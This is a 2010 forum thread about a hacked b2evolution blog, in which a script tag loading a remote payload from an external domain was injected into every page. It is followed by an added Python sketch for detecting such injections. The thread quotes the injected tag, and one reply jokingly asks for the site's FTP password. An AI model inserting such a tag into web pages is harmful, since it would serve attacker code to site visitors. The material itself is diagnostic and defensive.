
1 May 31, 2010 02:20    

My b2evolution Version: 3.3.3

My server was hacked several days ago. Someone added a script to every html.php page and now Google is restricting the site. jeevanswarg.com is the hacker.

I have removed/overwritten every html and php page within the entire blog yet when I view source code on every post I still see the script - even on a brand new test page.

Look for yourself, but not in Firefox since Google is restricting it:
http://www.ny-unique.com/blog/index.php/client-list

Every link within the blog also contains this script, but none of us can find where it resides!

I cannot find if there is a link on an included file that was also hacked. I have also checked the database but just found 1 session from this person which I deleted.

The script appears between the closing HEAD and first BODY tags.

<link rel="stylesheet" href="style.css" type="text/css" />
</head>

<script src=http://jeevanswarg.com/images/services.php ></script>

<body>

If anyone knows how I can remove this code, what file it appears on, please let me know ASAP!

2 May 31, 2010 02:55

The script may be included anywhere, but most likely in either index.main.php or _html_header.inc.php in your b2evo skin.

The actual file is jeevanswarg.com/images/services.php, so you may want to delete (or rename) it ASAP.

3 May 31, 2010 05:38

Thank you for your reply.

I have 3 skins installed, I removed everything else to be safe:

Both index.main.php and _html_header.inc.php did not contain any questionable code.

I have no access to jeevanswarg.com/images/services.php since this is the hacker's domain.

4 May 31, 2010 05:42

Can you PM me your FTP password? It has already been leaked to the hacker, so there's nothing to worry about :)

5 May 31, 2010 14:33

If you are running an opcode cache (like APC), make sure you clear it. You may have successfully eliminated the offending code, but a cached version might still be fighting you.

"The script appears between the closing HEAD and first BODY tags."

That would definitely suggest the _html_header.inc.php file, but check the _body_header.inc.php file just to be sure.
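
An added example, not part of the original thread or of b2evolution: a Python sketch of the two checks the replies converge on, first confirming from the rendered page that a foreign script sits between the closing HEAD and the BODY tag, then searching the files on disk for the same host. The function names, the sample page and the /js/site.js path are constructed for illustration.

```python
import os
import re
from urllib.parse import urlparse

# Script tags with a src attribute, quoted or unquoted (the thread's sample is unquoted).
SCRIPT_SRC = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)

def scripts_between_head_and_body(html, own_host):
    """Return foreign script URLs placed after </head> and before <body>."""
    low = html.lower()
    start = low.find("</head>")
    if start == -1:
        return []
    end = low.find("<body", start)
    gap = html[start:end if end != -1 else len(html)]
    hits = []
    for src in SCRIPT_SRC.findall(gap):
        host = urlparse(src).hostname  # None for relative URLs
        if host and host != own_host.lower():
            hits.append(src)
    return hits

def files_containing(root, needle, exts=(".php", ".html", ".htm")):
    """Walk root and list files whose raw bytes contain needle (case-insensitive)."""
    needle_b = needle.lower().encode()
    found = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    if needle_b in fh.read().lower():
                        found.append(path)
            except OSError:
                continue  # unreadable file: skip it, keep scanning
    return sorted(found)

# Constructed sample mirroring the snippet posted in the thread.
SAMPLE = """<head><link rel="stylesheet" href="style.css" type="text/css" />
</head>

<script src=http://jeevanswarg.com/images/services.php ></script>

<body><script src="/js/site.js"></script></body>"""

if __name__ == "__main__":
    for src in scripts_between_head_and_body(SAMPLE, "www.ny-unique.com"):
        print("injected:", src)
```

A hit in the rendered page with no matching file on disk is the situation the original poster describes, and is where the opcode-cache advice in post 5 applies.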

